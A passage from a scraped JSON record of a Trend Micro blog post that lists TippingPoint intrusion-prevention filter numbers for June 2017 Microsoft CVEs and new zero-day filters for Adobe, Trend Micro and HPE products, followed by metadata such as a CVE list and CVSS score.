Intelligence Provided \nCVE-2017-0299 | | No Vendor Intelligence Provided \nCVE-2017-0300 | | No Vendor Intelligence Provided \nCVE-2017-8460 | | No Vendor Intelligence Provided \nCVE-2017-8461 | | No Vendor Intelligence Provided \nCVE-2017-8462 | | No Vendor Intelligence Provided \nCVE-2017-8464 | 28614 | \nCVE-2017-8465 | 28616 | \nCVE-2017-8466 | 28618 | \nCVE-2017-8468 | 28620 | \nCVE-2017-8469 | | No Vendor Intelligence Provided \nCVE-2017-8470 | | No Vendor Intelligence Provided \nCVE-2017-8471 | | No Vendor Intelligence Provided \nCVE-2017-8472 | | No Vendor 
Intelligence Provided \nCVE-2017-8473 | | No Vendor Intelligence Provided \nCVE-2017-8474 | | No Vendor Intelligence Provided \nCVE-2017-8475 | | No Vendor Intelligence Provided \nCVE-2017-8476 | | No Vendor Intelligence Provided \nCVE-2017-8477 | | No Vendor Intelligence Provided \nCVE-2017-8478 | | No Vendor Intelligence Provided \nCVE-2017-8479 | | No Vendor Intelligence Provided \nCVE-2017-8480 | | No Vendor Intelligence Provided \nCVE-2017-8481 | | No Vendor Intelligence Provided \nCVE-2017-8482 | | No Vendor Intelligence Provided \nCVE-2017-8483 | | No Vendor Intelligence Provided \nCVE-2017-8484 | | No Vendor Intelligence Provided \nCVE-2017-8485 | | No Vendor Intelligence Provided \nCVE-2017-8487 | | No Vendor Intelligence Provided \nCVE-2017-8488 | | No Vendor Intelligence Provided \nCVE-2017-8489 | | No Vendor Intelligence Provided \nCVE-2017-8490 | | No Vendor Intelligence Provided \nCVE-2017-8491 | | No Vendor Intelligence Provided \nCVE-2017-8492 | | No Vendor Intelligence Provided \nCVE-2017-8493 | | No Vendor Intelligence Provided \nCVE-2017-8494 | | No Vendor Intelligence Provided \nCVE-2017-8496 | 28613 | \nCVE-2017-8497 | 28615 | \nCVE-2017-8498 | | No Vendor Intelligence Provided \nCVE-2017-8499 | | No Vendor Intelligence Provided \nCVE-2017-8504 | | No Vendor Intelligence Provided \nCVE-2017-8506 | | No Vendor Intelligence Provided \nCVE-2017-8507 | | No Vendor Intelligence Provided \nCVE-2017-8508 | | No Vendor Intelligence Provided \nCVE-2017-8509 | 28619 | \nCVE-2017-8510 | 28621 | \nCVE-2017-8511 | | No Vendor Intelligence Provided \nCVE-2017-8512 | | No Vendor Intelligence Provided \nCVE-2017-8513 | | No Vendor Intelligence Provided \nCVE-2017-8514 | | No Vendor Intelligence Provided \nCVE-2017-8515 | | No Vendor Intelligence Provided \nCVE-2017-8517 | | No Vendor Intelligence Provided \nCVE-2017-8519 | | No Vendor Intelligence Provided \nCVE-2017-8520 | | No Vendor Intelligence Provided \nCVE-2017-8521 | | No Vendor Intelligence Provided 
\nCVE-2017-8522 | | No Vendor Intelligence Provided \nCVE-2017-8523 | | No Vendor Intelligence Provided \nCVE-2017-8524 | 28622 | \nCVE-2017-8527 | | No Vendor Intelligence Provided \nCVE-2017-8528 | | No Vendor Intelligence Provided \nCVE-2017-8529 | | Insufficient Vendor Information \nCVE-2017-8530 | | No Vendor Intelligence Provided \nCVE-2017-8531 | | No Vendor Intelligence Provided \nCVE-2017-8532 | | No Vendor Intelligence Provided \nCVE-2017-8533 | | No Vendor Intelligence Provided \nCVE-2017-8534 | | No Vendor Intelligence Provided \nCVE-2017-8543 | 28629 | \nCVE-2017-8544 | | No Vendor Intelligence Provided \nCVE-2017-8545 | | No Vendor Intelligence Provided \nCVE-2017-8547 | 28611 | \nCVE-2017-8548 | | No Vendor Intelligence Provided \nCVE-2017-8549 | | No Vendor Intelligence Provided \nCVE-2017-8550 | | No Vendor Intelligence Provided \nCVE-2017-8551 | | No Vendor Intelligence Provided \nCVE-2017-8553 | | No Vendor Intelligence Provided \nCVE-2017-8554 | | No Vendor Intelligence Provided \nCVE-2017-8555 | | No Vendor Intelligence Provided \n \n \n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n| \n\n * 28543: ZDI-CAN-4719: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28544: ZDI-CAN-4729: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28546: ZDI-CAN-4730: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28547: ZDI-CAN-4731: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28548: ZDI-CAN-4732: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)**_ _** \n---|--- \n| \n \n**_Trend Micro (5)_**\n\n| \n\n * 28536: ZDI-CAN-4652: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28537: ZDI-CAN-4653: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28538: ZDI-CAN-4659: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28541: ZDI-CAN-4664: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)\n * 28542: ZDI-CAN-4671,4675: Zero Day Initiative Vulnerability (Trend Micro Mobile Security for Enterprise)**_ _** \n---|--- \n| \n \n**_Hewlett Packard Enterprise (1)_**\n\n| \n\n * 28608: HTTPS: HPE Network Automation RedirectServlet SQL Injection Vulnerability (ZDI-17-331)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-5-2017/>).", "cvss3": {}, "published": "2017-06-16T12:00:40", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 12, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8461", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", 
"CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8499", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8506", "CVE-2017-8464", "CVE-2017-8508", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8513", "CVE-2017-8550", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-8545", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8507", "CVE-2017-8474", "CVE-2017-8487", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-8509", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8551", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8512", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8520", "CVE-2017-8519", "CVE-2017-8521", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8511", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8555", "CVE-2017-8544", "CVE-2017-8510", "CVE-2017-8514", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8534", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2017-06-16T12:00:40", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-june-12-2017/", "id": "TRENDMICROBLOG:7C04AD3395CF22028CC84BEFD34A2090", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}